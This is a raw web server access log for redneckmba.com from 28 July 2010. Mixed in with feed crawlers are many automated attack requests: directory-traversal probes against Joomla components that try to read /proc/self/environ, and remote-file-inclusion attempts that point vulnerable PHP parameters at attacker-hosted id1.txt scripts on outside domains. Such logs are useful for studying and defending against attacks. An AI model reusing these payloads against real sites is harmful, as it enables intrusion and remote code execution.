58.248.90.168 - - [28/Jul/2010:13:12:24 -0700] "GET /logs/access_100712.log HTTP/1.1" 200 722261 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)" "redneckmba.com"
62.44.82.118 - - [28/Jul/2010:13:29:06 -0700] "GET /logs//index.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.803" "www.redneckmba.com"
62.44.82.118 - - [28/Jul/2010:13:29:06 -0700] "GET /index.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.803" "www.redneckmba.com"
62.44.82.118 - - [28/Jul/2010:13:29:31 -0700] "GET /logs//index.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.803" "www.redneckmba.com"
62.44.82.118 - - [28/Jul/2010:13:29:32 -0700] "GET /index.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.803" "www.redneckmba.com"
66.163.171.205 - - [28/Jul/2010:13:50:31 -0700] "GET /blog/?feed=rss2 HTTP/1.1" 404 - "-" "BuzzTracker/1.02 +http://www.buzztracker.com" "redneckmba.com"
76.13.114.107 - - [28/Jul/2010:14:20:55 -0700] "GET /blog/?feed=rss2 HTTP/1.1" 404 - "-" "BuzzTracker/1.02 +http://www.buzztracker.com" "redneckmba.com"
113.118.206.55 - - [28/Jul/2010:14:40:28 -0700] "GET /logs/access_100621.log HTTP/1.1" 200 483276 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)" "redneckmba.com"
76.13.123.195 - - [28/Jul/2010:14:51:04 -0700] "GET /blog/?feed=rss2 HTTP/1.1" 404 - "-" "BuzzTracker/1.02 +http://www.buzztracker.com" "redneckmba.com"
66.163.171.207 - - [28/Jul/2010:15:10:38 -0700] "GET /blog/?feed=rss2 HTTP/1.1" 404 - "-" "BuzzTracker/1.02 +http://www.buzztracker.com" "redneckmba.com"
67.159.44.97 - - [28/Jul/2010:15:13:25 -0700] "GET /components/com_flyspray/startdown.php?file=http://razi.teo.ir/images/maghale/id1.txt????? HTTP/1.1" 404 - "-" "Mozilla/5.0" "redneckmba.com"
67.159.44.97 - - [28/Jul/2010:15:13:25 -0700] "GET /logs//components/com_flyspray/startdown.php?file=http://razi.teo.ir/images/maghale/id1.txt????? HTTP/1.1" 404 - "-" "Mozilla/5.0" "redneckmba.com"
67.159.44.97 - - [28/Jul/2010:15:13:40 -0700] "GET /logs/access_100628.log//components/com_flyspray/startdown.php?file=http://razi.teo.ir/images/maghale/id1.txt????? HTTP/1.1" 404 - "-" "Mozilla/5.0" "redneckmba.com"
76.13.114.105 - - [28/Jul/2010:15:36:08 -0700] "GET /blog/?feed=rss2 HTTP/1.1" 404 - "-" "BuzzTracker/1.02 +http://www.buzztracker.com" "redneckmba.com"
118.160.138.238 - - [28/Jul/2010:15:51:09 -0700] "GET /logs/access_100621.log HTTP/1.1" 200 483276 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)" "redneckmba.com"
66.163.171.206 - - [28/Jul/2010:16:28:24 -0700] "GET /blog/?feed=rss2 HTTP/1.1" 404 - "-" "BuzzTracker/1.02 +http://www.buzztracker.com" "redneckmba.com"
76.13.123.195 - - [28/Jul/2010:16:37:52 -0700] "GET /blog/?feed=rss2 HTTP/1.1" 404 - "-" "BuzzTracker/1.02 +http://www.buzztracker.com" "redneckmba.com"
76.13.114.107 - - [28/Jul/2010:16:50:31 -0700] "GET /blog/?feed=rss2 HTTP/1.1" 404 - "-" "BuzzTracker/1.02 +http://www.buzztracker.com" "redneckmba.com"
208.80.194.39 - - [28/Jul/2010:17:31:51 -0700] "GET / HTTP/1.0" 200 763 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; YPC 3.0.1; SV1; .NET CLR 1.0.3705; .NET CLR 1.1.4322)" "www.redneckmba.com"
114.38.79.180 - - [28/Jul/2010:17:36:48 -0700] "GET /logs/access_100712.log HTTP/1.1" 200 722261 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)" "redneckmba.com"
81.208.34.38 - - [28/Jul/2010:17:43:47 -0700] "GET /logs/access.log//components/com_joomlalib/standalone/stubjambo.php?baseDir=http://www.babyshop.ru///ban/id.txt???? HTTP/1.1" 404 - "-" "libwww-perl/5.808" "www.redneckmba.com"
81.208.34.38 - - [28/Jul/2010:17:43:47 -0700] "GET /components/com_joomlalib/standalone/stubjambo.php?baseDir=http://www.babyshop.ru///ban/id.txt???? HTTP/1.1" 404 - "-" "libwww-perl/5.808" "www.redneckmba.com"
81.208.34.38 - - [28/Jul/2010:17:43:48 -0700] "GET /logs//components/com_joomlalib/standalone/stubjambo.php?baseDir=http://www.babyshop.ru///ban/id.txt???? HTTP/1.1" 404 - "-" "libwww-perl/5.808" "www.redneckmba.com"
81.208.34.38 - - [28/Jul/2010:17:44:14 -0700] "GET /admin/auth.php?xcart_dir=http://www.projectmoneygenerator.com/css/us/id1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.redneckmba.com"
81.208.34.38 - - [28/Jul/2010:17:44:14 -0700] "GET /logs//admin/auth.php?xcart_dir=http://www.projectmoneygenerator.com/css/us/id1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.redneckmba.com"
81.208.34.38 - - [28/Jul/2010:17:44:17 -0700] "GET /logs/access.log//admin/auth.php?xcart_dir=http://www.projectmoneygenerator.com/css/us/id1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.redneckmba.com"
66.163.171.205 - - [28/Jul/2010:17:47:28 -0700] "GET /blog/?feed=rss2 HTTP/1.1" 404 - "-" "BuzzTracker/1.02 +http://www.buzztracker.com" "redneckmba.com"
81.208.34.38 - - [28/Jul/2010:17:47:43 -0700] "GET /logs/access.log//components/com_joomlalib/standalone/stubjambo.php?baseDir=http://www.babyshop.ru///ban/id.txt???? HTTP/1.1" 404 - "-" "libwww-perl/5.808" "www.redneckmba.com"
81.208.34.38 - - [28/Jul/2010:17:47:44 -0700] "GET /components/com_joomlalib/standalone/stubjambo.php?baseDir=http://www.babyshop.ru///ban/id.txt???? HTTP/1.1" 404 - "-" "libwww-perl/5.808" "www.redneckmba.com"
81.208.34.38 - - [28/Jul/2010:17:47:44 -0700] "GET /logs//components/com_joomlalib/standalone/stubjambo.php?baseDir=http://www.babyshop.ru///ban/id.txt???? HTTP/1.1" 404 - "-" "libwww-perl/5.808" "www.redneckmba.com"
116.125.140.14 - - [28/Jul/2010:18:01:49 -0700] "GET /robots.txt HTTP/1.1" 404 - "-" "Mozilla/5.0 (compatible; MSIE or Firefox mutant; not on Windows server; +http://ws.daum.net/aboutWebSearch.html) Daumoa/2.0" "www.redneckmba.com"
116.125.140.14 - - [28/Jul/2010:18:01:39 -0700] "GET / HTTP/1.1" 200 779 "http://www.redneckmba.com/" "Mozilla/5.0 (compatible; MSIE or Firefox mutant; not on Windows server; +http://ws.daum.net/aboutWebSearch.html) Daumoa/2.0" "www.redneckmba.com"
76.13.114.107 - - [28/Jul/2010:18:06:16 -0700] "GET /blog/?feed=rss2 HTTP/1.1" 404 - "-" "BuzzTracker/1.02 +http://www.buzztracker.com" "redneckmba.com"
118.170.211.32 - - [28/Jul/2010:18:21:04 -0700] "GET /logs/access_100621.log HTTP/1.1" 200 483276 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)" "redneckmba.com"
76.13.123.195 - - [28/Jul/2010:18:24:07 -0700] "GET /blog/?feed=rss2 HTTP/1.1" 404 - "-" "BuzzTracker/1.02 +http://www.buzztracker.com" "redneckmba.com"
81.208.34.38 - - [28/Jul/2010:18:25:54 -0700] "GET /logs/access_100614.log//components/com_joomlalib/standalone/stubjambo.php?baseDir=http://www.babyshop.ru///ban/id.txt???? HTTP/1.1" 404 - "-" "libwww-perl/5.808" "www.redneckmba.com"
81.208.34.38 - - [28/Jul/2010:18:33:38 -0700] "GET /logs/access_100614.log//components/com_joomlalib/standalone/stubjambo.php?baseDir=http://www.babyshop.ru///ban/id.txt???? HTTP/1.1" 404 - "-" "libwww-perl/5.808" "www.redneckmba.com"
211.238.14.22 - - [28/Jul/2010:18:44:35 -0700] "GET /administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=http://www.kortech.cn/bbs//skin/zero_vote/fx29id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.redneckmba.com"
211.238.14.22 - - [28/Jul/2010:18:44:35 -0700] "GET /logs//administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=http://www.kortech.cn/bbs//skin/zero_vote/fx29id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.redneckmba.com"
211.238.14.22 - - [28/Jul/2010:18:44:35 -0700] "GET /logs/access.log%20%20//administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=http://www.kortech.cn/bbs//skin/zero_vote/fx29id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.redneckmba.com"
211.238.14.22 - - [28/Jul/2010:18:45:21 -0700] "GET /administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=http://www.kortech.cn/bbs//skin/zero_vote/fx29id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.redneckmba.com"
211.238.14.22 - - [28/Jul/2010:18:45:21 -0700] "GET /logs/access.log%20%20//administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=http://www.kortech.cn/bbs//skin/zero_vote/fx29id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.redneckmba.com"
211.238.14.22 - - [28/Jul/2010:18:45:24 -0700] "GET /logs//administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=http://www.kortech.cn/bbs//skin/zero_vote/fx29id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.redneckmba.com"
81.208.34.38 - - [28/Jul/2010:19:07:35 -0700] "GET /logs/access.log%20%20//admin/auth.php?xcart_dir=http://www.projectmoneygenerator.com/css/us/id1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.redneckmba.com"
66.163.171.205 - - [28/Jul/2010:19:08:29 -0700] "GET /blog/?feed=rss2 HTTP/1.1" 404 - "-" "BuzzTracker/1.02 +http://www.buzztracker.com" "redneckmba.com"
87.253.135.181 - - [28/Jul/2010:19:16:55 -0700] "GET /logs/access.log//index.php?option=com_sef&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.redneckmba.com"
87.253.135.181 - - [28/Jul/2010:19:16:55 -0700] "GET /index.php?option=com_sef&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.redneckmba.com"
87.253.135.181 - - [28/Jul/2010:19:16:56 -0700] "GET /logs//index.php?option=com_sef&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.redneckmba.com"
76.13.114.107 - - [28/Jul/2010:19:24:55 -0700] "GET /blog/?feed=rss2 HTTP/1.1" 404 - "-" "BuzzTracker/1.02 +http://www.buzztracker.com" "redneckmba.com"
58.60.100.123 - - [28/Jul/2010:19:34:24 -0700] "GET /logs/access_100621.log HTTP/1.1" 200 483276 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)" "redneckmba.com"
70.27.2.134 - - [28/Jul/2010:20:07:16 -0700] "GET /logs/access_100531.log HTTP/1.1" 404 - "http://www.google.ca/url?sa=t&source=web&cd=1&ved=0CBQQFjAA&url=http%3A%2F%2Fwww.redneckmba.com%2Flogs%2Faccess_100531.log&rct=j&q=76.13.114.106&ei=XfBQTP28LsT68AbYvo2IAQ&usg=AFQjCNHvuqIe-wY-wuz8lie3Bq8He9YYBg" "Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/533.4 (KHTML, like Gecko) Chrome/5.0.375.99 Safari/533.4" "www.redneckmba.com"
70.27.2.134 - - [28/Jul/2010:20:07:16 -0700] "GET /favicon.ico HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/533.4 (KHTML, like Gecko) Chrome/5.0.375.99 Safari/533.4" "www.redneckmba.com"
70.27.2.134 - - [28/Jul/2010:20:07:21 -0700] "GET /logs/access_100524.log HTTP/1.1" 404 - "http://www.google.ca/url?sa=t&source=web&cd=3&ved=0CBoQFjAC&url=http%3A%2F%2Fwww.redneckmba.com%2Flogs%2Faccess_100524.log&rct=j&q=76.13.114.106&ei=XfBQTP28LsT68AbYvo2IAQ&usg=AFQjCNGjwms0o5-r--_492pOVw2tfSWRRg" "Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/533.4 (KHTML, like Gecko) Chrome/5.0.375.99 Safari/533.4" "www.redneckmba.com"
70.27.2.134 - - [28/Jul/2010:20:07:21 -0700] "GET /favicon.ico HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/533.4 (KHTML, like Gecko) Chrome/5.0.375.99 Safari/533.4" "www.redneckmba.com"
76.13.123.195 - - [28/Jul/2010:20:15:18 -0700] "GET /blog/?feed=rss2 HTTP/1.1" 404 - "-" "BuzzTracker/1.02 +http://www.buzztracker.com" "redneckmba.com"
216.18.213.162 - - [28/Jul/2010:20:15:35 -0700] "GET /logs/access_100712.log HTTP/1.1" 200 722261 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)" "redneckmba.com"
216.18.213.162 - - [28/Jul/2010:20:18:44 -0700] "GET /logs/access_100614.log HTTP/1.1" 200 93466 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)" "redneckmba.com"
208.80.194.39 - - [28/Jul/2010:20:22:36 -0700] "GET / HTTP/1.0" 200 763 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; {AA1CD65F-1609-4766-A4A7-E4EE21F298B1}; FunWebProducts; .NET CLR 1.1.4322; .NET CLR 1.0.3705; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30)" "redneckmba.com"
94.155.49.192 - - [28/Jul/2010:20:28:49 -0700] "GET /bbs//delete_comment.php?board_skin_path=http://www.babelfamily.org/en/modules/mod_whosonline/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.redneckmba.com"
94.155.49.192 - - [28/Jul/2010:20:28:49 -0700] "GET /logs/access_100614.log/bbs//delete_comment.php?board_skin_path=http://www.babelfamily.org/en/modules/mod_whosonline/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.redneckmba.com"
94.155.49.192 - - [28/Jul/2010:20:28:49 -0700] "GET /logs/bbs//delete_comment.php?board_skin_path=http://www.babelfamily.org/en/modules/mod_whosonline/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.redneckmba.com"
94.155.49.192 - - [28/Jul/2010:20:29:08 -0700] "GET /logs/bbs//delete_comment.php?board_skin_path=http://www.babelfamily.org/en/modules/mod_whosonline/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.redneckmba.com"
94.155.49.192 - - [28/Jul/2010:20:29:08 -0700] "GET /logs/access_100614.log/bbs//delete_comment.php?board_skin_path=http://www.babelfamily.org/en/modules/mod_whosonline/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.redneckmba.com"
94.155.49.192 - - [28/Jul/2010:20:29:08 -0700] "GET /bbs//delete_comment.php?board_skin_path=http://www.babelfamily.org/en/modules/mod_whosonline/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.redneckmba.com"
66.163.171.207 - - [28/Jul/2010:20:33:31 -0700] "GET /blog/?feed=rss2 HTTP/1.1" 404 - "-" "BuzzTracker/1.02 +http://www.buzztracker.com" "redneckmba.com"
76.13.114.107 - - [28/Jul/2010:20:49:30 -0700] "GET /blog/?feed=rss2 HTTP/1.1" 404 - "-" "BuzzTracker/1.02 +http://www.buzztracker.com" "redneckmba.com"
111.248.15.112 - - [28/Jul/2010:20:49:30 -0700] "GET /logs/access_100621.log HTTP/1.1" 200 483276 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)" "redneckmba.com"
94.155.49.192 - - [28/Jul/2010:20:59:57 -0700] "GET /logs/access_100614.log%20%20/bbs//delete_comment.php?board_skin_path=http://www.babelfamily.org/en/modules/mod_whosonline/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.redneckmba.com"
94.155.49.192 - - [28/Jul/2010:21:00:29 -0700] "GET /logs/access_100614.log%20%20/bbs//delete_comment.php?board_skin_path=http://www.babelfamily.org/en/modules/mod_whosonline/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.redneckmba.com"
184.154.9.226 - - [28/Jul/2010:21:06:34 -0700] "GET /?option=com_joomlapicasa2&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 779 "-" "libwww-perl/5.834" "www.redneckmba.com"
184.154.9.226 - - [28/Jul/2010:21:06:40 -0700] "GET /?option=com_joomlapicasa2&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 779 "-" "libwww-perl/5.834" "www.redneckmba.com"
184.154.9.226 - - [28/Jul/2010:21:06:44 -0700] "GET /?option=com_joomlapicasa2&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 779 "-" "libwww-perl/5.834" "www.redneckmba.com"
76.13.114.105 - - [28/Jul/2010:21:25:31 -0700] "GET /blog/?feed=rss2 HTTP/1.1" 404 - "-" "BuzzTracker/1.02 +http://www.buzztracker.com" "redneckmba.com"
66.163.171.205 - - [28/Jul/2010:21:26:21 -0700] "GET /blog/?feed=rss2 HTTP/1.1" 404 - "-" "BuzzTracker/1.02 +http://www.buzztracker.com" "redneckmba.com"
76.13.123.195 - - [28/Jul/2010:21:37:28 -0700] "GET /blog/?feed=rss2 HTTP/1.1" 404 - "-" "BuzzTracker/1.02 +http://www.buzztracker.com" "redneckmba.com"
188.165.213.8 - - [28/Jul/2010:21:48:56 -0700] "GET /index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.803" "www.redneckmba.com"
188.165.213.8 - - [28/Jul/2010:21:49:08 -0700] "GET /index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.803" "www.redneckmba.com"
188.165.213.8 - - [28/Jul/2010:21:49:09 -0700] "GET /index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.803" "www.redneckmba.com"
188.165.213.8 - - [28/Jul/2010:21:49:48 -0700] "GET /index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.803" "www.redneckmba.com"
188.165.213.8 - - [28/Jul/2010:21:49:52 -0700] "GET /index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.803" "www.redneckmba.com"
188.165.213.8 - - [28/Jul/2010:21:50:18 -0700] "GET /index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.803" "www.redneckmba.com"
188.165.213.8 - - [28/Jul/2010:21:50:19 -0700] "GET /index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.803" "www.redneckmba.com"
188.165.213.8 - - [28/Jul/2010:21:50:39 -0700] "GET /index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.803" "www.redneckmba.com"
188.165.213.8 - - [28/Jul/2010:21:51:21 -0700] "GET /index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.803" "www.redneckmba.com"
76.13.114.107 - - [28/Jul/2010:21:51:52 -0700] "GET /blog/?feed=rss2 HTTP/1.1" 404 - "-" "BuzzTracker/1.02 +http://www.buzztracker.com" "redneckmba.com"
188.165.213.8 - - [28/Jul/2010:21:56:27 -0700] "GET /logs/access.log//index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.803" "www.redneckmba.com"
188.165.213.8 - - [28/Jul/2010:21:56:27 -0700] "GET /index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.803" "www.redneckmba.com"
188.165.213.8 - - [28/Jul/2010:21:56:27 -0700] "GET /logs//index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.803" "www.redneckmba.com"
188.165.213.8 - - [28/Jul/2010:21:56:33 -0700] "GET /logs/access.log//index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.803" "www.redneckmba.com"
188.165.213.8 - - [28/Jul/2010:21:56:33 -0700] "GET /index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.803" "www.redneckmba.com"
188.165.213.8 - - [28/Jul/2010:21:56:33 -0700] "GET /logs//index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.803" "www.redneckmba.com"
188.165.213.8 - - [28/Jul/2010:21:56:57 -0700] "GET /logs/access.log//index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.803" "www.redneckmba.com"
188.165.213.8 - - [28/Jul/2010:21:56:57 -0700] "GET /index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.803" "www.redneckmba.com"
188.165.213.8 - - [28/Jul/2010:21:56:57 -0700] "GET /logs//index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.803" "www.redneckmba.com"
188.165.213.8 - - [28/Jul/2010:21:58:00 -0700] "GET /logs/access.log//index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.803" "www.redneckmba.com"
188.165.213.8 - - [28/Jul/2010:21:58:00 -0700] "GET /index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.803" "www.redneckmba.com"
188.165.213.8 - - [28/Jul/2010:21:58:01 -0700] "GET /logs//index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.0" 404 - "-" "libwww-perl/5.803" "www.redneckmba.com"
188.165.213.8 - - [28/Jul/2010:21:58:38 -0700] "GET /logs/access.log//index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.803" "www.redneckmba.com"
188.165.213.8 - - [28/Jul/2010:21:58:38 -0700] "GET /index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.803" "www.redneckmba.com"
188.165.213.8 - - [28/Jul/2010:21:58:38 -0700] "GET /logs//index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.803" "www.redneckmba.com"
188.165.213.8 - - [28/Jul/2010:21:58:52 -0700] "GET /logs/access.log//index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.803" "www.redneckmba.com"
188.165.213.8 - - [28/Jul/2010:21:58:52 -0700] "GET /index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.803" "www.redneckmba.com"
188.165.213.8 - - [28/Jul/2010:21:58:52 -0700] "GET /logs//index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.803" "www.redneckmba.com"
188.165.213.8 - - [28/Jul/2010:21:58:59 -0700] "GET /logs/access.log//index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.803" "www.redneckmba.com"
188.165.213.8 - - [28/Jul/2010:21:58:59 -0700] "GET /index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.803" "www.redneckmba.com"
188.165.213.8 - - [28/Jul/2010:21:58:59 -0700] "GET /logs//index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.803" "www.redneckmba.com"
188.165.213.8 - - [28/Jul/2010:21:59:39 -0700] "GET /logs/access.log//index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.803" "www.redneckmba.com"
188.165.213.8 - - [28/Jul/2010:21:59:39 -0700] "GET /index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.803" "www.redneckmba.com"
188.165.213.8 - - [28/Jul/2010:21:59:39 -0700] "GET /logs//index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.803" "www.redneckmba.com"
66.163.171.206 - - [28/Jul/2010:22:01:27 -0700] "GET /blog/?feed=rss2 HTTP/1.1" 404 - "-" "BuzzTracker/1.02 +http://www.buzztracker.com" "redneckmba.com"
188.165.213.8 - - [28/Jul/2010:22:02:20 -0700] "GET /logs/access.log//index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.803" "www.redneckmba.com"
188.165.213.8 - - [28/Jul/2010:22:02:21 -0700] "GET /index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.803" "www.redneckmba.com"
188.165.213.8 - - [28/Jul/2010:22:02:21 -0700] "GET /logs//index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.803" "www.redneckmba.com"
188.165.213.8 - - [28/Jul/2010:22:03:45 -0700] "GET /logs/access.log//index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.803" "www.redneckmba.com"
188.165.213.8 - - [28/Jul/2010:22:03:45 -0700] "GET /index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.803" "www.redneckmba.com"
188.165.213.8 - - [28/Jul/2010:22:03:45 -0700] "GET /logs//index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.803" "www.redneckmba.com"
